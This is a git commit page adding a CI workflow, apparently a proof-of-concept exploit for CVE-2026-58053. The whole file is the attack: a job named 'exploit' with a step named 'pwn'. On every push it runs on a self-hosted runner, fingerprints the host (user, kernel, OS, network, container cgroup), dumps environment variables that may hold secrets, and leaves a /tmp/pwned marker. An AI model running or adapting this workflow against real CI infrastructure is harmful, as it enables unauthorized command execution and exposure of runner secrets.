ci
Some checks failed
CVE-2026-58053 / exploit (push) Has been cancelled

This commit is contained in:
2026-06-28 12:38:53 +00:00
parent c4d13c6f8e
commit 0cebe83245

View File

@ -0,0 +1,18 @@
name: CVE-2026-58053
on: push
jobs:
exploit:
runs-on: self-hosted
steps:
- name: pwn
run: |
echo "=== $(hostname) ==="
id
whoami
cat /etc/hostname
uname -a
cat /etc/os-release | head -3
ip addr 2>/dev/null | head -10 || ifconfig 2>/dev/null | head -10
cat /proc/1/cgroup 2>/dev/null | head -3
env | head -10
echo "=== DONE ===" > /tmp/pwned